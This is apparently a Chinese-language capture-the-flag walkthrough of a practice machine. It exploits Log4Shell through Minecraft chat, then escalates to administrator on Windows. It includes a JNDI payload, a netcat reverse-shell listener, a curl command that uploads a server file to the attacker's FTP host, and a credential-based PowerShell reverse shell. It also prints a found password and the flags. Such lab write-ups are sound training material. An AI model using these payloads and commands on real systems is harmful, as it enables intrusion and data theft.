Log4j漏洞利用与Minecraft服务器提权实战指南<\/h1>

1. 目标识别与信息收集<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行快速扫描，识别开放端口和服务：<\/p>
sudo nmap -p- -sS -T4 10.10.11.249
<\/span><\/span><\/code><\/pre>发现关键端口：<\/p>

25565端口：Minecraft服务器默认端口<\/li>
<\/ul>
1.2 主机解析配置<\/h3>
将目标主机名添加到本地hosts文件：<\/p>
echo "10.10.11.249 crafty.htb"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. 漏洞分析与利用准备<\/h2>
2.1 漏洞背景<\/h3>
CVE-2021-44228 (Log4Shell)<\/strong>：<\/p>

影响Apache Log4j日志库<\/li>
允许通过JNDI查询机制远程执行代码<\/li>
影响版本：2.0-beta9到2.14.1<\/li>
<\/ul>
2.2 利用工具准备<\/h3>

下载log4j漏洞利用工具：<\/li>
<\/ol>
git clone https:\/\/github.com\/kozmer\/log4j-shell-poc
<\/span><\/span>cd log4j-shell-poc
<\/span><\/span><\/code><\/pre>
修改POC脚本（针对Windows目标）：<\/li>
<\/ol>
vim log4j-shell-poc
<\/span><\/span># 将\/bin\/bash改为cmd.exe<\/span>
<\/span><\/span><\/code><\/pre>
准备Java环境：<\/li>
<\/ol>
wget https:\/\/repo.huaweicloud.com\/java\/jdk\/8u181-b13\/jdk-8u181-linux-x64.tar.gz
<\/span><\/span>tar -zxf jdk-8u181-linux-x64.tar.gz
<\/span><\/span>mv jdk1.8.0_181 jdk1.8.0_20
<\/span><\/span><\/code><\/pre>2.3 Minecraft客户端准备<\/h3>

下载TLauncher：<\/li>
<\/ol>
wget -O TLauncher-2.899.zip https:\/\/tlauncher.org\/jar
<\/span><\/span>unzip TLauncher-2.899.zip
<\/span><\/span><\/code><\/pre>
启动客户端并选择版本：<\/li>
<\/ol>
java -jar TLauncher-2.899.jar
<\/span><\/span># 选择1.16.5版本进行下载<\/span>
<\/span><\/span><\/code><\/pre>3. 漏洞利用与初始访问<\/h2>
3.1 启动漏洞利用服务<\/h3>
python3 poc.py --userip 10.10.16.23 --webport 8200<\/span> --lport 10032<\/span>
<\/span><\/span><\/code><\/pre>3.2 设置监听器<\/h3>
nc -lvnp 10032<\/span>
<\/span><\/span><\/code><\/pre>3.3 触发漏洞<\/h3>
在Minecraft游戏中：<\/p>

进入多人游戏<\/li>
按T<\/code>键打开聊天框<\/li>
输入payload：<\/li>
<\/ol>
${jndi:ldap:\/\/10.10.16.23:1389\/a}
<\/code><\/pre>
成功获取反向shell后，获取用户flag：<\/p>
dir<\/span> C:\Users\svc_minecraft\Desktop
<\/span><\/span>type<\/span> C:\Users\svc_minecraft\Desktop\user.txt
<\/span><\/span># fa3ee28076b9040712a643b7f1c0b67e
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 发现关键文件<\/h3>
在服务器目录中发现可疑jar包：<\/p>
plugins\/playercounter-1.0-SNAPSHOT.jar
<\/code><\/pre>
4.2 文件传输方法<\/h3>
由于无法直接写入IIS目录，使用curl+FTP传输文件：<\/p>

在Kali上设置FTP服务器：<\/li>
<\/ol>
pip3 install pyftpdlib
<\/span><\/span>mkdir ftp_temp; cd ftp_temp
<\/span><\/span>python3 -m pyftpdlib -w -u martin -P martin -p 21<\/span>
<\/span><\/span><\/code><\/pre>
从目标服务器下载jar文件：<\/li>
<\/ol>
在目标服务器上执行：<\/p>
curl -T c:\users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar -u martin:martin ftp:\/\/10.10.16.23\/
<\/span><\/span><\/code><\/pre>4.3 分析jar文件<\/h3>
使用JD-GUI工具分析：<\/p>
sudo apt install jd-gui
<\/span><\/span>jd-gui
<\/span><\/span><\/code><\/pre>发现RCON密码：s67u84zKq8IXw<\/code><\/p>
4.4 权限提升方法<\/h3>
方法一：使用runas命令<\/h4>
cmdkey \/list  # 查看存储的凭据
<\/span><\/span>runas \/env \/noprofile \/savecred \/user:JUGG-efrost\administrator "cmd.exe \/c whoami > whoami.txt"<\/span>
<\/span><\/span><\/code><\/pre>方法二：PowerShell凭证传递<\/h4>

准备反向shell脚本reverse.ps1<\/code><\/li>
通过FTP上传到目标<\/li>
在目标上执行：<\/li>
<\/ol>
$secpasswd = ConvertTo-SecureString "s67u84zKq8IXw"<\/span> -AsPlainText -Force
<\/span><\/span>$mycreds = New-Object System.Management.Automation.PSCredential ("Administrator"<\/span>, $secpasswd)
<\/span><\/span>Start-Process -FilePath powershell.exe -argumentlist ".\reverse.ps1"<\/span> -Credential $mycreds
<\/span><\/span><\/code><\/pre>成功获取管理员权限后，获取root flag：<\/p>
499d7b2f787007256ecb549acaa96c25
<\/code><\/pre>
5. 附录：实用工具<\/h2>
5.1 Windows提权工具<\/h3>


WinPEAS<\/strong>：<\/p>

自动收集系统信息并检查安全漏洞<\/li>
下载：https:\/\/github.com\/peass-ng\/PEASS-ng\/releases<\/li>
<\/ul>
<\/li>

Seatbelt<\/strong>：<\/p>

Windows主机安全审计工具<\/li>
下载：https:\/\/github.com\/r3motecontrol\/Ghostpack-CompiledBinaries<\/li>
<\/ul>
<\/li>

JAWS<\/strong>：<\/p>

PowerShell枚举脚本<\/li>
下载：https:\/\/github.com\/411Hall\/JAWS<\/li>
<\/ul>
<\/li>
<\/ol>
5.2 技术要点解析<\/h3>


SecureString<\/strong>：<\/p>

PowerShell中存储敏感信息的数据类型<\/li>
以加密方式存储在内存中，使用后立即清除<\/li>
<\/ul>
<\/li>

PSCredential<\/strong>：<\/p>

封装用户名和密码的凭据对象<\/li>
用于需要认证的操作如远程连接、进程启动<\/li>
<\/ul>
<\/li>

Start-Process<\/strong>：<\/p>

启动新进程并指定凭据<\/li>
可用于以不同用户身份执行命令<\/li>
<\/ul>
<\/li>
<\/ol>